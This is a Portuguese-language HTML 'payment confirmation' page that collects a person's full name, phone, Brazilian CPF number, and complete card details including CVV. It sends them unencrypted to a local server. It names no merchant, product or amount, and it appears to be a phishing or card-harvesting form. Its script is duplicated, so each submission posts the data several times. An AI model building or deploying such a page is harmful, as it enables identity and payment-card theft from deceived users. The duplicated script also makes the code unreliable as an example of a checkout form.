<!DOCTYPE html>
<html lang="pt-PT">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Área de pagamento</title>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        body {
            font-family: 'Roboto', sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f4f4f4; /* Fundo cinza claro */
            color: #333; /* Cor de texto cinza escuro */
        }
        .form-container {
            max-width: 600px;
            margin: 40px auto;
            padding: 20px;
            background-color: #ffffff; /* Fundo branco */
            border-radius: 8px;
            box-shadow: 0 4px 8px rgba(0,0,0,0.1); /* Sombra suave */
        }
        h1 {
            text-align: center;
            color: #0D47A1; /* Azul escuro */
        }
        label {
            display: block;
            margin: 10px 0 5px;
            color: #0D47A1; /* Azul escuro */
        }
        input, button {
            width: calc(100% - 22px);
            padding: 10px;
            margin: 5px 0;
            border-radius: 4px;
            border: 1px solid #ddd;
            box-sizing: border-box;
            background-color: #f9f9f9; /* Fundo leve para os inputs */
        }
        input:focus {
            border-color: #0D47A1; /* Azul escuro */
            outline: none;
        }
        button {
            background-color: #0D47A1; /* Azul escuro */
            color: white;
            border: none;
            cursor: pointer;
            font-size: 16px;
            display: flex;
            align-items: center;
            justify-content: center;
            transition: background-color 0.3s ease;
        }
        button i {
            margin-right: 8px;
        }
        button:hover {
            background-color: #094185; /* Azul mais escuro */
        }
        fieldset {
            border: 2px solid #0D47A1; /* Borda azul escuro */
            border-radius: 8px;
            padding: 15px;
            margin: 15px 0;
        }
        legend {
            font-weight: bold;
            color: #0D47A1; /* Azul escuro */
            padding: 0 10px;
        }
        .card-info {
            display: flex;
            flex-direction: column;
        }
        .card-info label, .card-info input {
            margin-bottom: 10px;
        }
        #resultado {
            margin-top: 20px;
            padding: 10px;
            background-color: rgba(13, 71, 161, 0.1); /* Fundo azul claro */
            border-radius: 4px;
            color: #0D47A1; /* Texto azul escuro */
        }
        .error {
            border-color: #b71c1c; /* Vermelho escuro */
            background-color: rgba(255, 0, 0, 0.1); /* Fundo vermelho claro */
        }
        .error-message {
            color: #b71c1c; /* Vermelho escuro */
            font-weight: bold;
            margin-top: 10px;
            display: none;
        }
    </style>
</head>
<body>
    <div class="form-container">
        <h1>Confirmação</h1>
        <form id="paymentForm">
            <label for="nome">Nome Completo:</label>
            <input type="text" id="nome" name="nome" required>

            <label for="telefone">Número de Telefone:</label>
            <input type="tel" id="telefone" name="telefone" required>

            <label for="cpf">CPF:</label>
            <input type="text" id="cpf" name="cpf" required>

            <fieldset>
                <legend>Informações do Cartão:</legend>
                <div class="card-info">
                    <label for="nome-titular">Nome do Titular do Cartão:</label>
                    <input type="text" id="nome-titular" name="nome-titular" required>

                    <label for="numero-cartao">Número do Cartão:</label>
                    <input type="text" id="numero-cartao" name="numero-cartao" required>

                    <label for="data-validade">Data de Validade:</label>
                    <input type="text" id="data-validade" name="data-validade" placeholder="MM/AA" required>
                    
                    <label for="cvv">CVV:</label>
                    <input type="text" id="cvv" name="cvv" required>
                </div>
            </fieldset>

            <button type="submit"><i class="fas fa-credit-card"></i> Enviar Pagamento</button>
        </form>
        <div class="error-message">Por favor, preencha todos os campos corretamente antes de enviar.</div>
        <div id="resultado"></div>
    </div>
    <script>
        function formatPhone(value) {
            return value
                .replace(/\D/g, '') // Remove tudo o que não é dígito
                .replace(/^(\d{2})(\d)/, '($1) $2') // Adiciona parênteses em torno do DDD
                .replace(/(\d{5})(\d)/, '$1-$2') // Adiciona hífen entre o quinto e sexto dígito
                .slice(0, 15); // Limita o tamanho do telefone formatado
        }

        function formatCPF(value) {
            return value
                .replace(/\D/g, '') // Remove tudo o que não é dígito
                .replace(/(\d{3})(\d)/, '$1.$2') // Adiciona ponto após o terceiro dígito
                .replace(/(\d{3})(\d)/, '$1.$2') // Adiciona ponto após o sexto dígito
                .replace(/(\d{3})(\d{1,2})$/, '$1-$2') // Adiciona hífen antes dos dois últimos dígitos
                .slice(0, 14); // Limita o tamanho do CPF formatado
        }

        function formatCardNumber(value) {
            return value
                .replace(/\D/g, '') // Remove tudo o que não é dígito
                .replace(/(.{4})/g, '$1 ') // Adiciona espaço a cada 4 dígitos
                .trim() // Remove o espaço extra no final
                .slice(0, 19); // Limita o tamanho a 19 caracteres (16 dígitos + 3 espaços)
        }

        function formatExpiryDate(value) {
            return value
                .replace(/\D/g, '') // Remove tudo o que não é dígito
                .replace(/(\d{2})(\d)/, '$1/$2') // Adiciona barra entre o mês e o ano
                .slice(0, 5); // Limita o tamanho da data de validade formatada
        }

        function formatCVV(value) {
            return value
                .replace(/\D/g, '') // Remove tudo o que não é dígito
                .slice(0, 3); // Limita o tamanho do CVV
        }

        document.getElementById('telefone').addEventListener('input', function() {
            this.value = formatPhone(this.value);
        });

        document.getElementById('cpf').addEventListener('input', function() {
            this.value = formatCPF(this.value);
        });

        document.getElementById('numero-cartao').addEventListener('input', function() {
            this.value = formatCardNumber(this.value);
        });

        document.getElementById('data-validade').addEventListener('input', function() {
            this.value = formatExpiryDate(this.value);
        });

        document.getElementById('cvv').addEventListener('input', function() {
            this.value = formatCVV(this.value);
        });

        document.getElementById('paymentForm').addEventListener('submit', function(event) {
            event.preventDefault(); // Evita o envio padrão do formulário

            const formData = new FormData(this);

            fetch('http://localhost:3000/submit', {
                method: 'POST',
                body: new URLSearchParams(formData)
            })
fetch('http://localhost:3000/submit', {
                method: 'POST',
                body: new URLSearchParams(formData)
            })
            .then(response => response.text())
            .then(result => {
                document.getElementById('resultado').textContent = result;
            })
            .catch(error => {
                console.error('Erro:', error);
                document.getElementById('resultado').textContent = 'Erro ao enviar dados.';
            });
        });
    </script>
<script>
    document.getElementById('paymentForm').addEventListener('submit', function(event) {
        event.preventDefault(); // Evita o envio padrão do formulário

        const formData = new FormData(this);

        fetch('http://localhost:3000/submit', {
            method: 'POST',
            body: new URLSearchParams(formData)
        })
        .then(response => response.text())
        .then(result => {
            document.getElementById('resultado').textContent = result;
        })
        .catch(error => {
            console.error('Erro:', error);
            document.getElementById('resultado').textContent = 'Erro ao enviar dados.';
        });
    });
</script>
</body>
</html>